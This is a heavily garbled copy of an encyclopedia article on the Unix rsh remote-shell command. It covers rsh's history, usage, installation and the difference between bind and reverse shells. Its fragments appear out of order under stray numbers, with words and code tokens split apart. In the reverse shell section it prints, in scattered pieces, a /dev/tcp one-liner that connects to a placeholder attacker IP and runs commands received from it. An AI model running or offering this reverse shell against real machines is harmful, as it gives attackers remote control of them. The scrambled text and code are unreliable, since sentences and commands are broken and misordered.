25:
382:
Reverse shell can be used when the device on which the command is to be executed is not directly accessible - for example, for remote maintenance of computers located behind NAT that cannot be accessed from the outside. Some exploits create reverse shell from an attacked device back to machines
378:
A remote shell session can be initiated by either a local device (which sends commands) or a remote device (on which commands are executed). In the first case remote shell will be called bind shell, in the second case - reverse shell.
503:
667:
585:
737:
556:
108:
638:
495:
238:
46:
89:
340:
After the command has finished rsh terminates. If no command is specified then rsh will log in on the remote system using
213:
42:
61:
659:
524:
727:
686:
383:
controlled by the attackers (called "reverse shell attack"). The following code demonstrates a reverse shell attack:
68:
217:
35:
704:
577:
148:
75:
732:
283:
184:
177:
57:
548:
470:
279:
229:
345:
206:
606:
287:
458:
260:
241:
210:
192:
188:
180:
155:
454:
373:
82:
461:
back to the socket. In other words, it gives the attacker a remote shell on the machine.
630:
295:
160:
721:
698:
631:"The Evolution of Remote Shell and the Security Layers of Browser-Based Law Software"
475:
303:
291:
252:
package on 4.2BSD in 1983. rsh has since been ported to other operating systems.
24:
457:. It then repeatedly read lines from the socket and run the line, piping both
245:
712:
690:
299:
268:
264:
344:. The network location of the remote computer is looked up using the
341:
249:
708:
294:
over the network, among other reasons. Some implementations also
259:
command has the same name as another common UNIX utility, the
18:
314:
As an example of rsh use, the following executes the command
302:
over the network. rsh has largely been replaced with the
525:"Secure Shell Protocol – Everything you need to know"
453:
It opens a TCP socket to attacker IP at port 80 as a
154:
144:
126:
49:. Unsourced material may be challenged and removed.
578:"Difference Between Bind Shell and Reverse Shell"
496:"SSH, the Secure Shell: The Definitive Guide"
8:
121:
282:which involve user authentication, the rsh
271:, the restricted shell is often located at
120:
109:Learn how and when to remove this message
356:Command to install rsh client using apt
487:
396:<>/dev/tcp/<attacker_IP>/80
306:(ssh) program, even on local networks.
209:(rshd). The daemon typically uses the
7:
703:: remote shell –
47:adding citations to reliable sources
191:, and on another computer across a
290:for network use, because it sends
14:
363:apt-getinstallrsh-redone-client
23:
670:from the original on 2023-11-28
641:from the original on 2023-11-11
588:from the original on 2023-11-11
559:from the original on 2023-11-11
506:from the original on 2023-11-11
333:rsh-lremoteuserhost.example.com
34:needs additional citations for
1:
738:Unix network-related software
214:Transmission Control Protocol
368:Bind shell and reverse shell
326:running a UNIX-like system:
198:The remote system to which
132:; 41 years ago
754:
660:"What is a Reverse Shell?"
607:"What is a Reverse Shell?"
371:
263:, which first appeared in
237:originated as part of the
227:
335:"mkdir testdir"
385:
358:
328:
298:by sending unencrypted
292:unencrypted information
635:www.lawsupport.com.au
582:www.geeksforgeeks.org
549:"Secure Shell (SSH)"
500:www.researchgate.net
43:improve this article
16:Command-line program
471:Berkeley r-commands
280:Berkeley r-commands
230:Berkeley r-commands
123:
728:Internet protocols
687:rsh - remote shell
553:www.techtarget.com
346:Domain Name System
269:System V Release 4
202:connects runs the
122:remote shell (rsh)
711:General Commands
611:www.techslang.com
459:stdout and stderr
248:, as part of the
183:that can execute
166:
165:
119:
118:
111:
93:
745:
702:
701:
679:
678:
676:
675:
656:
650:
649:
647:
646:
627:
621:
620:
618:
617:
603:
597:
596:
594:
593:
574:
568:
567:
565:
564:
545:
539:
538:
536:
535:
521:
515:
514:
512:
511:
492:
449:
446:
443:
440:
436:
433:
429:
425:
422:
419:
415:
412:
409:
406:
403:
399:
395:
392:
389:
362:
336:
332:
324:host.example.com
322:on the computer
274:
261:restricted shell
258:
242:operating system
193:computer network
181:computer program
156:Operating system
140:
138:
133:
124:
114:
107:
103:
100:
94:
92:
51:
27:
19:
753:
752:
748:
747:
746:
744:
743:
742:
718:
717:
697:
696:
683:
682:
673:
671:
658:
657:
653:
644:
642:
629:
628:
624:
615:
613:
605:
604:
600:
591:
589:
576:
575:
571:
562:
560:
547:
546:
542:
533:
531:
523:
522:
518:
509:
507:
494:
493:
489:
484:
467:
455:file descriptor
451:
450:
447:
444:
441:
438:
434:
431:
427:
423:
420:
417:
413:
410:
407:
404:
401:
397:
393:
390:
387:
376:
374:Shell shoveling
370:
365:
364:
360:
354:
338:
337:
334:
330:
312:
272:
256:
232:
226:
136:
134:
131:
127:Initial release
115:
104:
98:
95:
52:
50:
40:
28:
17:
12:
11:
5:
751:
749:
741:
740:
735:
730:
720:
719:
716:
715:
694:
681:
680:
651:
622:
598:
569:
540:
516:
486:
485:
483:
480:
479:
478:
473:
466:
463:
386:
369:
366:
359:
353:
350:
329:
311:
308:
228:Main article:
225:
222:
185:shell commands
164:
163:
161:Cross-platform
158:
152:
151:
146:
142:
141:
128:
117:
116:
58:"Remote Shell"
31:
29:
22:
15:
13:
10:
9:
6:
4:
3:
2:
750:
739:
736:
734:
733:OS/2 commands
731:
729:
726:
725:
723:
714:
710:
706:
700:
695:
692:
688:
685:
684:
669:
665:
661:
655:
652:
640:
636:
632:
626:
623:
612:
608:
602:
599:
587:
583:
579:
573:
570:
558:
554:
550:
544:
541:
530:
526:
520:
517:
505:
501:
497:
491:
488:
481:
477:
474:
472:
469:
468:
464:
462:
460:
456:
384:
380:
375:
367:
357:
351:
349:
347:
343:
327:
325:
321:
317:
316:mkdir testdir
309:
307:
305:
301:
297:
293:
289:
285:
281:
276:
270:
266:
262:
253:
251:
247:
244:, along with
243:
240:
236:
231:
223:
221:
219:
215:
212:
208:
205:
201:
196:
194:
190:
186:
182:
179:
175:
171:
162:
159:
157:
153:
150:
147:
143:
129:
125:
113:
110:
102:
91:
88:
84:
81:
77:
74:
70:
67:
63:
60: –
59:
55:
54:Find sources:
48:
44:
38:
37:
32:This article
30:
26:
21:
20:
672:. Retrieved
663:
654:
643:. Retrieved
634:
625:
614:. Retrieved
610:
601:
590:. Retrieved
581:
572:
561:. Retrieved
552:
543:
532:. Retrieved
528:
519:
508:. Retrieved
499:
490:
476:secure shell
452:
381:
377:
355:
352:Installation
339:
323:
319:
315:
313:
304:secure shell
296:authenticate
277:
273:/usr/bin/rsh
254:
234:
233:
203:
199:
197:
178:command-line
173:
170:remote shell
169:
167:
105:
96:
86:
79:
72:
65:
53:
41:Please help
36:verification
33:
218:port number
187:as another
722:Categories
674:2023-11-28
645:2023-11-11
616:2023-11-11
592:2023-11-11
563:2023-11-11
534:2023-11-11
510:2023-11-11
482:References
372:See also:
320:remoteuser
211:well-known
145:Written in
99:April 2014
69:newspapers
300:passwords
278:As other
691:man page
668:Archived
639:Archived
586:Archived
557:Archived
504:Archived
465:See also
318:as user
284:protocol
265:PWB/UNIX
239:BSD Unix
400:cat<
310:Example
286:is not
224:History
176:) is a
135: (
83:scholar
713:Manual
705:Darwin
699:rsh(1)
689:- rsh
664:Sysdig
529:dev.to
342:rlogin
288:secure
250:rlogin
216:(TCP)
207:daemon
85:
78:
71:
64:
56:
709:macOS
439:&
432:&
411:while
402:&
267:; in
220:513.
90:JSTOR
76:books
707:and
448:done
437:>
430:>
426:line
416:line
414:read
391:exec
255:The
189:user
168:The
137:1983
130:1983
62:news
424:\$
388:$
331:$
257:rsh
246:rcp
235:Rsh
204:rsh
200:rsh
174:rsh
45:by
724::
666:.
662:.
637:.
633:.
609:.
584:.
580:.
555:.
551:.
527:.
502:.
498:.
421:do
361:#
348:.
275:.
195:.
693:.
677:.
648:.
619:.
595:.
566:.
537:.
513:.
445:;
442:5
435:5
428:2
418:;
408:|
405:5
398:;
394:5
172:(
149:C
139:)
112:)
106:(
101:)
97:(
87:·
80:·
73:·
66:·
39:.
Text is available under the Creative Commons Attribution-ShareAlike License. Additional terms may apply.